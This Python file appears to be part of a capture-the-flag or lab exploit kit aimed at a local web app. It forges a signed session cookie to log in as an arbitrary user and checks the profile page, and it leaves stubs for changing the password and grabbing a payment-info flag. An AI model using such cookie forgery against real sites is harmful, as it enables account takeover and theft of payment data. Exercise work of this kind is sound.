import random
import logging
import requests

from typing import Optional
from bs4 import BeautifulSoup

from exploit_module.common import USER_AGENT
from exploit_module.common import create_cookie

_logger = logging.getLogger(__name__)

def check_fake_cookie_on_www(domain="http://localhost:5001", endpoint="/profile", username=None) -> bool:
    if username is None:
        # Generate 10 random ascii characters for the username
        username = ''.join(random.choices('abcdefghijklmnopqrstuvwxyz', k=10))

    # Create a cookie with a fake signed secret key
    cookie = create_cookie(username)
    
    # Create the cookie dictionary
    cookies = {
        "session": cookie
    }
    
    url = f"{domain}{endpoint}"
    # Send a request to the frontend profile endpoint with the fake cookie
    response = requests.get(url, cookies=cookies, headers={"User-Agent": USER_AGENT}, verify=False)

    if response.status_code == 200:
        # NOTE: Another place that could be checked might be the web page title?
        # Parse the html
        html_parsed = BeautifulSoup(response.text, 'lxml')
        # Get the navbar class
        navbar = html_parsed.find('nav', class_='navbar')
        if navbar is None:
            _logger.warning(f"[-] Frontend profile endpoint on {domain} did not return a navbar. Cannot verify if the fake cookie worked. Response: {response.text}")
            return False
        # Find the item with href /profile in the navbar
        profile_link = navbar.find('a', href='/profile')
        if profile_link and profile_link.text == username:
            _logger.info(f"[+] Successfully accessed frontend profile endpoint on {domain} as {username}")
            return True
        else:
            _logger.warning(f"[-] Frontend profile endpoint on {domain} did not return the expected username in the navbar. Got {profile_link.text if profile_link else 'no profile link found'} instead of {username}")
            return False
    else:
        _logger.info(f"[-] Failed to access frontend profile endpoint on {domain}. HTTP {response.status_code}")
        return False

def change_password_on_www(domain="http://localhost:5001", new_password='tacocatcat', cookie: Optional[str] = None) -> bool:
    # TODO: Attempt to change the password on the `auth/change-password` endpoint with the cookie, which will cause the payment info flag to drop.
    raise NotImplementedError("This method is not implemented yet. TODO: Implement this method to change the password on the frontend, which will cause the payment info flag to drop.")
    
def get_payment_info_flag(domain="http://localhost:5001", cookie: Optional[str] = None) -> Optional[str]:
    # TODO: Hit the `payment/get_payment_info` endpoint with the cookie to check for a payment info flag.
    # TODO: How to know that we got the flag for the payment info since it is random?
    raise NotImplementedError("This method is not implemented yet. TODO: Implement this method to get the payment info flag from the frontend.")

# TODO: Create a method that registers a new user and saves it for future use

# TODO: Create a method that does a login as that user and stores the cookie for future use if the fake cookie does not work